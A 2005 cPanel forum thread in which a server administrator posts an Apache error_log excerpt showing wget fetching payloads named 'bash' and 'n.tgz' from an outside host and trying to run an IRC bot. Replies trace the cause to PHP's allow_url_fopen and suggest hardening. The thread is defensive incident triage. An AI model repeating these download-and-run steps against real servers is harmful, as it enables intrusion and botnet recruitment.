The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Attacks agains Apache in error_log

Discussion in 'EasyApache' started by carock, Aug 22, 2005.

  1. carock

    carock Well-Known Member

    Joined:
    Sep 25, 2002
    Messages:
    232
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    St. Charles, MO
    I'm trying to fingure out how my box is being attacked. I'm looking the the Apache error_log and I find entries like this every once in a while...

    [Mon Aug 22 08:11:18 2005] [error] [client 168.209.98.35] File does not exist: /home/amiga84/public_html/images/form.5B4jpg
    [Mon Aug 22 08:11:18 2005] [error] [client 168.209.98.35] File does not exist: /home/amiga84/public_html/404.shtml
    --08:11:31-- http://wget/
    => `index.html'
    Resolving wget... failed: Host not found.
    --08:11:31-- http://members.lycos.co.uk/icetriton/bash
    => `bash'
    Resolving members.lycos.co.uk... done.
    Connecting to members.lycos.co.uk[212.78.204.20]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 18,649 [text/plain]

    0K .......... ........ 100% 56.38 KB/s

    08:11:32 (56.38 KB/s) - `bash' saved [18649/18649]


    FINISHED --08:11:32--
    Downloaded: 18,649 bytes in 1 files
    sh: line 1: ./bash: Permission denied
    sh: line 1: cd: /var/spool/samba: No such file or directory
    sh: line 1: lwget: command not found
    tar (child): n.tgz: Cannot open: No such file or directory
    tar (child): Error is not recoverable: exiting now
    tar: Child returned status 2
    tar: Error exit delayed from previous errors
    sh: line 1: cd: bot: No such file or directory
    [Mon Aug 22 08:20:01 2005] [error] [client 132.22.254.237] File does not exist: /home/cruize/public_html/cancun-vacation-deals/404.shtml
    [Mon Aug 22 08:20:15 2005] [error] [client 132.22.254.237] File does not exist: /home/cruize/public_html/cancun-vacation-deals/images/rollovers/sun$
    [Mon Aug 22 08:20:15 2005] [error] [client 132.22.254.237] File does not exist: /home/cruize/public_html/cancun-vacation-deals/404.shtml
    [Mon Aug 22 08:20:22 2005] [error] [client 65.54.188.137] File does not exist: /home/amig/public_html/news/1999/0425-amiga.shtml
    [Mon Aug 22 08:20:22 2005] [error] [client 65.54.188.137] File does not exist: /home/amig/public_html/404.shtml
    --08:22:01-- http://members.lycos.co.uk/icetriton/n.tgz
    => `n.tgz'
    Resolving members.lycos.co.uk... done.
    Connecting to members.lycos.co.uk[212.78.204.20]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 217,288 [text/plain]

    0K .......... .......... .......... .......... .......... 23% 80.65 KB/s
    50K .......... .......... .......... .......... .......... 47% 318.47 KB/s
    100K .......... .......... .......... .......... .......... 70% 314.47 KB/s
    150K .......... .......... .......... .......... .......... 94% 337.84 KB/s
    200K .......... .. 100% 1.70 MB/s

    08:22:03 (194.50 KB/s) - `n.tgz' saved [217288/217288]

    sh: line 1: ./bash: Permission denied
    -----------------------------------------------------------
    and so on.

    The wierd thing is all the regular log entries in the middle. There's no request or source IP's logged, so I don't know where to go to findout how this person is getting files to upload on the server.

    Anyone deal with this before? I have Apache 1.3.33 and WHM 10.1.0 cPanel 10.2.0-S83 on RedHat 9

    Thanks,
    Chuck
     
  2. romanh

    romanh Member

    Joined:
    Feb 27, 2004
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    1
    I have the same errors right now

    I have the same errors right now.
    I found that it is a issue of OpenSSL.
    For attacer is possible to gain a shell.
    The attacer usually save the file to /tmp or /var/tmp directory.
    He ussually runs some 'bot' scripts for IRC, DCC, ...

    I have CentOS 3 and I'm going to reinstall my box to Fedora Core 4.
    CentOS does not provide the OpenSSL updates.
    Also I think will be the same with Fedora 4, but I'll try to build OpenSSL from source
    so later I can easily patch it.

    Roman
     
  3. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    What did you do to secure your server? Do you have system based firewall including Mod Security, Mod Evasive, APF and BFD? Are they confgiured properly and have a very good set of rules?

    Do you see any unusual server load?
     
  4. romanh

    romanh Member

    Joined:
    Feb 27, 2004
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    1
    I have just APF

    I have just APF installed.
    This is the versions on my box

    Apache 1.3.34

    OpenSSL 0.9.7a

    PHP 4.4.2
     
  5. romanh

    romanh Member

    Joined:
    Feb 27, 2004
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    1
    Found a solution

    It is quite known bug in PHP.
    to solve this I had to set allow_url_fopen = Off in php.ini
     

Share This Page